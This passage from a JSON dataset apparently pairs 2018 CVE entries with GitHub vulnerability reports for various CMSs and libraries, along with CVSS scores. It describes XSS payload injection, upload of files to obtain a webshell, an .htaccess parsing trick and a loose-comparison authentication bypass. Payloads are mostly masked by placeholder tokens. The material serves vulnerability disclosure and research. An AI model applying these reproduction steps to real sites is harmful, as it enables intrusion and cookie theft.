  18399. "Issue_Url_old": "https://github.com/philippe/FrogCMS/issues/6",
  18400. "Issue_Url_new": "https://github.com/philippe/frogcms/issues/6",
  18401. "Repo_new": "philippe/frogcms",
  18402. "Issue_Created_At": "2018-04-23T12:25:52Z",
  18403. "description": "Frog CMS NUMBERTAG has a stored Cross Site Scripting Vulnerability. I have found a stored Cross Site Scripting Vulnerability. log into the system as an administrator role\uff1a URLTAG publish an article\uff0cand you can click it. pages APITAG Page APITAG payload: \"/> APITAG confirm NUMBERTAG APITAG i think you can see the following picture to konw more. FILETAG FILETAG POC: POST PATHTAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: URLTAG Content Type: application/x www form urlencoded Content Length NUMBERTAG Cookie: current_tab=:tab NUMBERTAG UM_distinctid NUMBERTAG db NUMBERTAG f8a NUMBERTAG c NUMBERTAG a NUMBERTAG db NUMBERTAG f8c3bc; APITAG NUMBERTAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG csrf_token NUMBERTAG ac0a NUMBERTAG ca5abfea6; APITAG Connection: keep alive Upgrade Insecure Requests NUMBERTAG APITAG APITAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG when we published the article and we can see it from homepage. URL\uff1a URLTAG FILETAG FILETAG Anyone who visit the target page will be affected to triage APITAG code, including administrator, editor, developer, and guest. If people read our articles, we can easily get their cookie. APITAG APITAG Affected Version NUMBERTAG",
  18404. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  18405. "severity": "MEDIUM",
  18406. "baseScore": 4.8,
  18407. "impactScore": 2.7,
  18408. "exploitabilityScore": 1.7
  18409. },
  18410. {
  18411. "CVE_ID": "CVE-2018-10319",
  18412. "Issue_Url_old": "https://github.com/philippe/FrogCMS/issues/7",
  18413. "Issue_Url_new": "https://github.com/philippe/frogcms/issues/7",
  18414. "Repo_new": "philippe/frogcms",
  18415. "Issue_Created_At": "2018-04-23T12:48:47Z",
  18416. "description": "Frog CMS NUMBERTAG has a stored Cross Site Scripting Vulnerability. I have found a stored Cross Site Scripting Vulnerability. log into the system as an administrator role\uff1a URLTAG publish an article\uff0cand you can click it. snippet APITAG snippet APITAG payload\uff1a APITAG \"/> APITAG confirm NUMBERTAG APITAG APITAG save it. i think you can see the following picture to konw more. exp: POST PATHTAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: URLTAG Content Type: application/x www form urlencoded Content Length NUMBERTAG Cookie: current_tab=:tab NUMBERTAG expanded_rows NUMBERTAG UM_distinctid NUMBERTAG db NUMBERTAG f8a NUMBERTAG c NUMBERTAG a NUMBERTAG db NUMBERTAG f8c3bc; APITAG NUMBERTAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG csrf_token NUMBERTAG ac0a NUMBERTAG ca5abfea6; APITAG Connection: keep alive Upgrade Insecure Requests NUMBERTAG APITAG APITAG \"/> APITAG confirm NUMBERTAG APITAG APITAG FILETAG FILETAG FILETAG Affected Version NUMBERTAG",
  18417. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  18418. "severity": "MEDIUM",
  18419. "baseScore": 4.8,
  18420. "impactScore": 2.7,
  18421. "exploitabilityScore": 1.7
  18422. },
  18423. {
  18424. "CVE_ID": "CVE-2018-10320",
  18425. "Issue_Url_old": "https://github.com/philippe/FrogCMS/issues/8",
  18426. "Issue_Url_new": "https://github.com/philippe/frogcms/issues/8",
  18427. "Repo_new": "philippe/frogcms",
  18428. "Issue_Created_At": "2018-04-23T13:00:17Z",
  18429. "description": "Frog CMS NUMBERTAG has a stored Cross Site Scripting Vulnerability. I have found a stored Cross Site Scripting Vulnerability. log into the system as an administrator role\uff1a URLTAG publish an article\uff0cand you can click it. layouts APITAG layout APITAG payload\uff1a APITAG \"/> APITAG confirm NUMBERTAG APITAG APITAG save it. i think you can see the following picture to konw more. exp POST PATHTAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: URLTAG Content Type: application/x www form urlencoded Content Length NUMBERTAG Cookie: current_tab=:tab NUMBERTAG expanded_rows NUMBERTAG UM_distinctid NUMBERTAG db NUMBERTAG f8a NUMBERTAG c NUMBERTAG a NUMBERTAG db NUMBERTAG f8c3bc; APITAG NUMBERTAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG csrf_token NUMBERTAG ac0a NUMBERTAG ca5abfea6; APITAG Connection: keep alive Upgrade Insecure Requests NUMBERTAG APITAG APITAG \"/> APITAG confirm NUMBERTAG APITAG APITAG FILETAG FILETAG FILETAG payload\uff1a APITAG APITAG APITAG APITAG Affected Version NUMBERTAG",
  18430. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  18431. "severity": "MEDIUM",
  18432. "baseScore": 4.8,
  18433. "impactScore": 2.7,
  18434. "exploitabilityScore": 1.7
  18435. },
  18436. {
  18437. "CVE_ID": "CVE-2018-10321",
  18438. "Issue_Url_old": "https://github.com/philippe/FrogCMS/issues/5",
  18439. "Issue_Url_new": "https://github.com/philippe/frogcms/issues/5",
  18440. "Repo_new": "philippe/frogcms",
  18441. "Issue_Created_At": "2018-04-23T10:40:30Z",
  18442. "description": "Frog CMS NUMBERTAG has a stored Cross Site Scripting Vulnerability. Hi, I have found a stored Cross Site Scripting Vulnerability. Steps to replicate NUMBERTAG log into the system as an administrator role NUMBERTAG enter page: URLTAG and click Settings option NUMBERTAG navigate to APITAG Site title\" section NUMBERTAG enter payload as shown in below section: ERRORTAG NUMBERTAG isit URLTAG you will triage APITAG execution Impacts: Anyone who visit the target page will be affected to triage APITAG code, including administrator, editor, developer, and guest. Affected Version NUMBERTAG Affected URL: URLTAG",
  18443. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  18444. "severity": "MEDIUM",
  18445. "baseScore": 4.8,
  18446. "impactScore": 2.7,
  18447. "exploitabilityScore": 1.7
  18448. },
  18449. {
  18450. "CVE_ID": "CVE-2018-10329",
  18451. "Issue_Url_old": "https://github.com/phpipam/phpipam/issues/1903",
  18452. "Issue_Url_new": "https://github.com/phpipam/phpipam/issues/1903",
  18453. "Repo_new": "phpipam/phpipam",
  18454. "Issue_Created_At": "2018-04-23T07:34:27Z",
  18455. "description": "Reflected xss on phpipam NUMBERTAG URLTAG URLTAG",
  18456. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  18457. "severity": "MEDIUM",
  18458. "baseScore": 6.1,
  18459. "impactScore": 2.7,
  18460. "exploitabilityScore": 2.8
  18461. },
  18462. {
  18463. "CVE_ID": "CVE-2018-10362",
  18464. "Issue_Url_old": "https://github.com/phpLiteAdmin/pla/issues/11",
  18465. "Issue_Url_new": "https://github.com/phpliteadmin/pla/issues/11",
  18466. "Repo_new": "phpliteadmin/pla",
  18467. "Issue_Created_At": "2018-04-23T04:31:51Z",
  18468. "description": "Authorization bypass in FILETAG . The APITAG function of the Authorization class uses '==' comparison instead of '===' comparison. This can lead to a problem if the password is a number written in scientific notation. E.g.: php > var_dump NUMBERTAG e2'); bool(true) php > var_dump NUMBERTAG e NUMBERTAG You should use === even if this is just a problem with a small impact.",
  18469. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  18470. "severity": "CRITICAL",
  18471. "baseScore": 9.8,
  18472. "impactScore": 5.9,
  18473. "exploitabilityScore": 3.9
  18474. },
  18475. {
  18476. "CVE_ID": "CVE-2018-10364",
  18477. "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/332",
  18478. "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/332",
  18479. "Repo_new": "bigtreecms/bigtree-cms",
  18480. "Issue_Created_At": "2018-03-31T00:24:34Z",
  18481. "description": "Cross Site Script. XSS in user management page may lead to privilege escalation. Reproduction NUMBERTAG Log in as a normal user with little privilege NUMBERTAG Modify current user's profile. Insert malicious code into either name field or company field. APITAG of them are vulnerable NUMBERTAG Wait until administrator visit the user management page. APITAG APITAG BTW, may I be rewarded with a CVE id? Appreciate it in advance.",
  18482. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  18483. "severity": "MEDIUM",
  18484. "baseScore": 5.4,
  18485. "impactScore": 2.7,
  18486. "exploitabilityScore": 2.3
  18487. },
  18488. {
  18489. "CVE_ID": "CVE-2018-10367",
  18490. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/135",
  18491. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/135",
  18492. "Repo_new": "wuzhicms/wuzhicms",
  18493. "Issue_Created_At": "2018-04-24T13:05:10Z",
  18494. "description": "Two Stored XSS Vulnerability. Two Stored XSS when post an article Steps to Reproduce APITAG the backstage URLTAG NUMBERTAG Go to content management, choose an existing one or post a new on to edit FILETAG APITAG are two Stored XSS, a)the first one lie in the title section b)the secone lie the the content section(you need to change to source code mode) FILETAG APITAG and we can see the page we just edit, the title is too obvious FILETAG APITAG a)title section FILETAG b)content section FILETAG",
  18495. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  18496. "severity": "MEDIUM",
  18497. "baseScore": 4.8,
  18498. "impactScore": 2.7,
  18499. "exploitabilityScore": 1.7
  18500. },
  18501. {
  18502. "CVE_ID": "CVE-2018-10368",
  18503. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/136",
  18504. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/136",
  18505. "Repo_new": "wuzhicms/wuzhicms",
  18506. "Issue_Created_At": "2018-04-24T13:39:09Z",
  18507. "description": "Stored XSS Vulnerability. Stored XSS Vulnerability Found in Extension module > System Announcement Steps to Reproduce APITAG the backstage URLTAG NUMBERTAG Go to Extension Module > System Announcement > Post an new one FILETAG NUMBERTAG set to the source code mode, add the following payload to content section APITAG FILETAG APITAG and see the announcement we just posted FILETAG FILETAG Stored XSS triggered ...",
  18508. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  18509. "severity": "MEDIUM",
  18510. "baseScore": 4.8,
  18511. "impactScore": 2.7,
  18512. "exploitabilityScore": 1.7
  18513. },
  18514. {
  18515. "CVE_ID": "CVE-2018-10374",
  18516. "Issue_Url_old": "https://github.com/teameasy/EasyCMS/issues/1",
  18517. "Issue_Url_new": "https://github.com/teameasy/easycms/issues/1",
  18518. "Repo_new": "teameasy/easycms",
  18519. "Issue_Created_At": "2018-04-24T14:35:55Z",
  18520. "description": "Easycms has a Reflexive Cross Site Scripting Vulnerability. Download and install, on the front page, \uff08 FILETAG \uff09 All search boxes exist in XSS, payload \uff1a \"/> APITAG confirm NUMBERTAG APITAG exp: POST PATHTAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: FILETAG Content Type: application/x www form urlencoded Content Length NUMBERTAG Cookie: dwz_theme=default; UM_distinctid NUMBERTAG db NUMBERTAG f8a NUMBERTAG c NUMBERTAG a NUMBERTAG db NUMBERTAG f8c3bc; APITAG NUMBERTAG APITAG APITAG APITAG APITAG think_template=default; APITAG APITAG APITAG APITAG APITAG APITAG APITAG csrf_token NUMBERTAG ac0a NUMBERTAG ca5abfea6 Connection: keep alive Upgrade Insecure Requests NUMBERTAG s=\"/> APITAG confirm NUMBERTAG APITAG FILETAG",
  18521. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  18522. "severity": "MEDIUM",
  18523. "baseScore": 6.1,
  18524. "impactScore": 2.7,
  18525. "exploitabilityScore": 2.8
  18526. },
  18527. {
  18528. "CVE_ID": "CVE-2018-10375",
  18529. "Issue_Url_old": "https://github.com/ky-j/dedecms/issues/1",
  18530. "Issue_Url_new": "https://github.com/ky-j/dedecms/issues/1",
  18531. "Repo_new": "ky-j/dedecms",
  18532. "Issue_Created_At": "2018-04-24T03:07:39Z",
  18533. "description": "File uploading vulnerability exists in the file of APITAG NUMBERTAG SP2 version, which can be utilized by attackers to upload script file to obtain webshell.. FILETAG",
  18534. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  18535. "severity": "CRITICAL",
  18536. "baseScore": 9.8,
  18537. "impactScore": 5.9,
  18538. "exploitabilityScore": 3.9
  18539. },
  18540. {
  18541. "CVE_ID": "CVE-2018-10391",
  18542. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/134",
  18543. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/134",
  18544. "Repo_new": "wuzhicms/wuzhicms",
  18545. "Issue_Created_At": "2018-04-24T07:26:21Z",
  18546. "description": "There is a cross site scripting vulnerability . > A xss vulnerability was discovered in WUZHI CMS NUMBERTAG There is a persistent XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML via the email parameter post to the APITAG When the background administrator inquires about the personal information of this ordinary member, XSS triggers successfully. POC vulnerability trigger point FILETAG ERRORTAG APITAG FILETAG",
  18547. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  18548. "severity": "MEDIUM",
  18549. "baseScore": 4.8,
  18550. "impactScore": 2.7,
  18551. "exploitabilityScore": 1.7
  18552. },
  18553. {
  18554. "CVE_ID": "CVE-2018-10422",
  18555. "Issue_Url_old": "https://github.com/Neeke/HongCMS/issues/2",
  18556. "Issue_Url_new": "https://github.com/neeke/hongcms/issues/2",
  18557. "Repo_new": "neeke/hongcms",
  18558. "Issue_Created_At": "2018-04-25T14:08:53Z",
  18559. "description": "Stored XSS APITAG Privilege). Stored XSS found in content field when post a site news Steps To Reproduce: APITAG the backstage: URLTAG NUMBERTAG FILETAG APITAG content field to the following payload APITAG FILETAG NUMBERTAG On the site front page, we can see the news we just posted FILETAG The Same with following FILETAG Set content field to same payload, (a lot of aaa... is for discrimination) APITAG Go to: URLTAG FILETAG",
  18560. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  18561. "severity": "MEDIUM",
  18562. "baseScore": 4.8,
  18563. "impactScore": 2.7,
  18564. "exploitabilityScore": 1.7
  18565. },
  18566. {
  18567. "CVE_ID": "CVE-2018-10423",
  18568. "Issue_Url_old": "https://github.com/bg5sbk/MiniCMS/issues/18",
  18569. "Issue_Url_new": "https://github.com/bg5sbk/minicms/issues/18",
  18570. "Repo_new": "bg5sbk/minicms",
  18571. "Issue_Created_At": "2018-04-23T14:46:28Z",
  18572. "description": "Information Disclosure APITAG Authentication). I found two information leakage vulnerabilities in APITAG you need to login the backstage first. The first one reveals the web root files on the web server: Steps to reproduce: APITAG in to the backstage URLTAG APITAG an article APITAG the page and see FILETAG APITAG url will direct to the following... FILETAG We can see all the files locate in web root the the server. The second reveals the real path of the APITAG files Steps to reproduce APITAG in to the backstage URLTAG APITAG an article APITAG to re edit this page, actually this page is save as iabl NUMBERTAG dat FILETAG we can see : FILETAG APITAG burp to intercept this request the original id is iabl NUMBERTAG and we change to hello iabl NUMBERTAG FILETAG APITAG hello iabl NUMBERTAG is not really exists, error occurs FILETAG This vulnerability reveals the full path of APITAG",
  18573. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N",
  18574. "severity": "LOW",
  18575. "baseScore": 2.7,
  18576. "impactScore": 1.4,
  18577. "exploitabilityScore": 1.2
  18578. },
  18579. {
  18580. "CVE_ID": "CVE-2018-10429",
  18581. "Issue_Url_old": "https://github.com/CosmoCMS/Cosmo/issues/405",
  18582. "Issue_Url_new": "https://github.com/cosmocms/cosmo/issues/405",
  18583. "Repo_new": "cosmocms/cosmo",
  18584. "Issue_Created_At": "2018-04-26T05:24:47Z",
  18585. "description": "There is a getshell vulnerability. Steps to Reproduce NUMBERTAG Go to FILETAG NUMBERTAG FILETAG APITAG Go to FILETAG Then the PHP code is executed FILETAG",
  18586. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  18587. "severity": "CRITICAL",
  18588. "baseScore": 9.8,
  18589. "impactScore": 5.9,
  18590. "exploitabilityScore": 3.9
  18591. },
  18592. {
  18593. "CVE_ID": "CVE-2018-10430",
  18594. "Issue_Url_old": "https://github.com/chekun/DiliCMS/issues/57",
  18595. "Issue_Url_new": "https://github.com/chekun/dilicms/issues/57",
  18596. "Repo_new": "chekun/dilicms",
  18597. "Issue_Created_At": "2018-04-26T05:29:11Z",
  18598. "description": "Stored XSS Vulnerability Found in System setting > site setting. Steps to Reproduce APITAG the backstage FILETAG NUMBERTAG Go to System setting >site setting FILETAG NUMBERTAG add the following payload to the fourth textbo NUMBERTAG APITAG APITAG alert NUMBERTAG APITAG FILETAG APITAG and see the announcement we just posted FILETAG FILETAG And then Stored XSS triggered ...",
  18599. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  18600. "severity": "MEDIUM",
  18601. "baseScore": 4.8,
  18602. "impactScore": 2.7,
  18603. "exploitabilityScore": 1.7
  18604. },
  18605. {
  18606. "CVE_ID": "CVE-2018-10469",
  18607. "Issue_Url_old": "https://github.com/b3log/symphony/issues/620",
  18608. "Issue_Url_new": "https://github.com/b3log/symphony/issues/620",
  18609. "Repo_new": "b3log/symphony",
  18610. "Issue_Created_At": "2018-04-27T02:16:33Z",
  18611. "description": "Any File Upload. Hey man~I found a vulnerability: Can upload any file. My test environment symphony version : latest OS : Windows NUMBERTAG Browser : APITAG Tool : APITAG Data : APITAG NUMBERTAG AM Vulnerability details Location : /upload HTTP Request: FILETAG POST parameter named APITAG , I can change file name, e.g. APITAG . Uploaded file will not be parsed on this site APITAG , but others can. Attack I can upload jsp file directly to the website, and get webshell.",
  18612. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  18613. "severity": "CRITICAL",
  18614. "baseScore": 9.8,
  18615. "impactScore": 5.9,
  18616. "exploitabilityScore": 3.9
  18617. },
  18618. {
  18619. "CVE_ID": "CVE-2018-10527",
  18620. "Issue_Url_old": "https://github.com/teameasy/EasyCMS/issues/2",
  18621. "Issue_Url_new": "https://github.com/teameasy/easycms/issues/2",
  18622. "Repo_new": "teameasy/easycms",
  18623. "Issue_Created_At": "2018-04-26T16:06:48Z",
  18624. "description": "There is a Stored XSS with APITAG Stored XSS found when post an article Steps To Reproduce: APITAG the backstage: FILETAG APITAG post an article, you need to create an article classification, now we have class \"a\" FILETAG APITAG post a new article or edit an existing one FILETAG NUMBERTAG No NUMBERTAG is a simple test to check whether field is vulnerable to stored xss a)tilte filed FILETAG b)keyword field FILETAG Then go to the site front page : URLTAG c)abstract field FILETAG Then click the article to see more d)content filed FILETAG The Above four fields are prone to store xss attack",
  18625. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  18626. "severity": "MEDIUM",
  18627. "baseScore": 5.4,
  18628. "impactScore": 2.7,
  18629. "exploitabilityScore": 2.3
  18630. },
  18631. {
  18632. "CVE_ID": "CVE-2018-10528",
  18633. "Issue_Url_old": "https://github.com/LibRaw/LibRaw/issues/144",
  18634. "Issue_Url_new": "https://github.com/libraw/libraw/issues/144",
  18635. "Repo_new": "libraw/libraw",
  18636. "Issue_Created_At": "2018-04-27T08:41:33Z",
  18637. "description": "out of bound read in APITAG The GET_PROPERTY_TABLE in NUMBERTAG f_load_property_list function get a large name_offset and value_offset, the programe will crash in parse NUMBERTAG f funtion 's APITAG name) and APITAG value) when it access a unreadable address. CODETAG Please assign a CVE ID, thank you!",
  18638. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  18639. "severity": "HIGH",
  18640. "baseScore": 8.8,
  18641. "impactScore": 5.9,
  18642. "exploitabilityScore": 2.8
  18643. },
  18644. {
  18645. "CVE_ID": "CVE-2018-10536",
  18646. "Issue_Url_old": "https://github.com/dbry/WavPack/issues/32",
  18647. "Issue_Url_new": "https://github.com/dbry/wavpack/issues/32",
  18648. "Repo_new": "dbry/wavpack",
  18649. "Issue_Created_At": "2018-04-23T00:04:40Z",
  18650. "description": "APITAG crashes . Dear all, This bug was found with APITAG an extension of AFL. Thanks also to Marcel B\u00f6hme, Andrew Santosa and Alexandru Razvan Caciulescu. This could lead to denial of service and potentially code execution. This bug was found on Ubuntu NUMBERTAG bit & APITAG revision NUMBERTAG a NUMBERTAG HEAD) To reproduce: Download & extract the attached file wavpack_crash4.wav wavpack y wavpack_crash4.wav Error message: ERRORTAG Valgrind says: CODETAG ASAN says: ERRORTAG Regards, Thuan FILETAG",
  18651. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  18652. "severity": "HIGH",
  18653. "baseScore": 7.8,
  18654. "impactScore": 5.9,
  18655. "exploitabilityScore": 1.8
  18656. },
  18657. {
  18658. "CVE_ID": "CVE-2018-10536",
  18659. "Issue_Url_old": "https://github.com/dbry/WavPack/issues/31",
  18660. "Issue_Url_new": "https://github.com/dbry/wavpack/issues/31",
  18661. "Repo_new": "dbry/wavpack",
  18662. "Issue_Created_At": "2018-04-22T23:56:28Z",
  18663. "description": "APITAG crashes Heap buffer overwrite . Dear all, This bug was found with APITAG an extension of AFL. Thanks also to Marcel B\u00f6hme, Andrew Santosa and Alexandru Razvan Caciulescu. This FILETAG could lead to denial of service and potentially code execution. This bug was found on Ubuntu NUMBERTAG bit & APITAG revision NUMBERTAG a NUMBERTAG HEAD) To reproduce: Download & extract the attached file wavpack_crash2.wav wavpack y wavpack_crash2.wav Error message: ERRORTAG Valgrind says: CODETAG ASAN says: ERRORTAG Regards, Thuan",
  18664. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  18665. "severity": "HIGH",
  18666. "baseScore": 7.8,
  18667. "impactScore": 5.9,
  18668. "exploitabilityScore": 1.8
  18669. },
  18670. {
  18671. "CVE_ID": "CVE-2018-10536",
  18672. "Issue_Url_old": "https://github.com/dbry/WavPack/issues/30",
  18673. "Issue_Url_new": "https://github.com/dbry/wavpack/issues/30",
  18674. "Repo_new": "dbry/wavpack",
  18675. "Issue_Created_At": "2018-04-22T23:51:48Z",
  18676. "description": "wavpack crashes many Heap buffer overwrites . Dear all, This bug was found with APITAG an extension of AFL. Thanks also to Marcel B\u00f6hme, Andrew Santosa and Alexandru Razvan Caciulescu. This has many heap buffer overwrites could lead to denial of service and potentially code execution. This bug was found on Ubuntu NUMBERTAG bit & APITAG revision NUMBERTAG a NUMBERTAG HEAD) To reproduce: Download & extract the attached file wavpack_crash1.wav wavpack y wavpack_crash1.wav Error message: ERRORTAG Valgrind says: ERRORTAG ASAN says: ERRORTAG Regards, Thuan FILETAG",
  18677. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  18678. "severity": "HIGH",
  18679. "baseScore": 7.8,
  18680. "impactScore": 5.9,
  18681. "exploitabilityScore": 1.8
  18682. },
  18683. {
  18684. "CVE_ID": "CVE-2018-10538",
  18685. "Issue_Url_old": "https://github.com/dbry/WavPack/issues/33",
  18686. "Issue_Url_new": "https://github.com/dbry/wavpack/issues/33",
  18687. "Repo_new": "dbry/wavpack",
  18688. "Issue_Created_At": "2018-04-23T00:08:47Z",
  18689. "description": "APITAG crashes SEGFAULT Invalid write. Dear all, This bug was found with APITAG an extension of AFL. Thanks also to Marcel B\u00f6hme, Andrew Santosa and Alexandru Razvan Caciulescu. This could lead to denial of service and potentially code execution. This bug was found on Ubuntu NUMBERTAG bit & APITAG revision NUMBERTAG a NUMBERTAG HEAD) To reproduce: Download & extract the attached file wavpack_crash5.wav wavpack y wavpack_crash5.wav Error message: CODETAG Valgrind says ERRORTAG ASAN says: ERRORTAG Regards, Thuan FILETAG",
  18690. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  18691. "severity": "MEDIUM",
  18692. "baseScore": 5.5,
  18693. "impactScore": 3.6,
  18694. "exploitabilityScore": 1.8
  18695. },
  18696. {
  18697. "CVE_ID": "CVE-2018-10570",
  18698. "Issue_Url_old": "https://github.com/philippe/FrogCMS/issues/9",
  18699. "Issue_Url_new": "https://github.com/philippe/frogcms/issues/9",
  18700. "Repo_new": "philippe/frogcms",
  18701. "Issue_Created_At": "2018-04-28T10:55:25Z",
  18702. "description": "Frog CMS NUMBERTAG has a stored Cross Site Scripting Vulnerability . I discovered a storage XSS vulnerability while auditing the code Vulnerability points appear in the FILETAG file FILETAG POST passed in FILETAG EXP is as follows: FILETAG The result of EXP is as follows: FILETAG",
  18703. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  18704. "severity": "MEDIUM",
  18705. "baseScore": 4.8,
  18706. "impactScore": 2.7,
  18707. "exploitabilityScore": 1.7
  18708. },
  18709. {
  18710. "CVE_ID": "CVE-2018-10571",
  18711. "Issue_Url_old": "https://github.com/openemr/openemr/issues/1518",
  18712. "Issue_Url_new": "https://github.com/openemr/openemr/issues/1518",
  18713. "Repo_new": "openemr/openemr",
  18714. "Issue_Created_At": "2018-03-22T00:13:53Z",
  18715. "description": "Security issues reported by outside group.",
  18716. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  18717. "severity": "MEDIUM",
  18718. "baseScore": 6.1,
  18719. "impactScore": 2.7,
  18720. "exploitabilityScore": 2.8
  18721. },
  18722. {
  18723. "CVE_ID": "CVE-2018-10574",
  18724. "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/335",
  18725. "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/335",
  18726. "Repo_new": "bigtreecms/bigtree-cms",
  18727. "Issue_Created_At": "2018-04-25T04:29:16Z",
  18728. "description": "Getshell via upload function. > Tested on NUMBERTAG Platform: Ubuntu + Apache2 prerequisite In the configuration of Apache, APITAG should be All for web directories so that htaccess in sub directories can take effect. However, it is very easy to satisfy because the URL rewrite function also needs it. Rationale Since APITAG needs to ensure the compatibility, it has to use blacklist to filter the extensions of uploaded files. However, while we cannot upload files ended with \"ph \", we can upload some files to change the rule of parsing. Actually, we can upload a APITAG to the server to make any files in the same directory executed as php files. Reproduction NUMBERTAG Preparation Prepare two files. One is a file named as haozhe or whatever you want. The other one is APITAG In haozhe : APITAG In APITAG : APITAG Upload Two files In the page of URLTAG , click Browse button to upload a file. Upload these two files. It works! APITAG",
  18729. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  18730. "severity": "CRITICAL",
  18731. "baseScore": 9.8,
  18732. "impactScore": 5.9,
  18733. "exploitabilityScore": 3.9
  18734. },
  18735. {
  18736. "CVE_ID": "CVE-2018-10581",
  18737. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/4474",
  18738. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/4474",
  18739. "Repo_new": "octopusdeploy/issues",
  18740. "Issue_Created_At": "2018-04-13T01:00:30Z",
  18741. "description": "Tenant Variables view able/update able for Environments not scoped in the associated Team when logged in User is associated with Multiple APITAG Roles. Version: Tested and replicated in Octopus version APITAG Issue: The logged in user is able to PATHTAG variable values within the Tenant Variables area for Environments that do not exist within their associated Team scoping. This occurs in situations where the logged in Users also belongs to multiple teams where one of the Teams has the APITAG permission for APITAG permissions exist for the environment. Replication Steps NUMBERTAG Create a Test Project with APITAG FILETAG NUMBERTAG Connect the associated Project to a newly generated Tenants and select two environments (i.e. Testing & Production ); FILETAG NUMBERTAG Create a Project Template within the Project; FILETAG NUMBERTAG Create a Test Octopus User NUMBERTAG Create two Teams based on the Permissions information specified below and associate the newly created User with these Teams NUMBERTAG Login to Octopus as the newly created User NUMBERTAG Navigate to Tenants > Variables NUMBERTAG In this area it's possible to PATHTAG variables belonging to environments that are not specified within the Team that has the APITAG required containing the APITAG permission NUMBERTAG The expected behavior here would be still be able to view the variable but updating/saving should not be an option; FILETAG Permissions Information: User Roles: APITAG Role Test Editor_ FILETAG APITAG Role Test Reviewer_ FILETAG Teams: APITAG Test Editor_ FILETAG APITAG Test Reviewer_ FILETAG Test Permissions Export FILETAG Source: URLTAG",
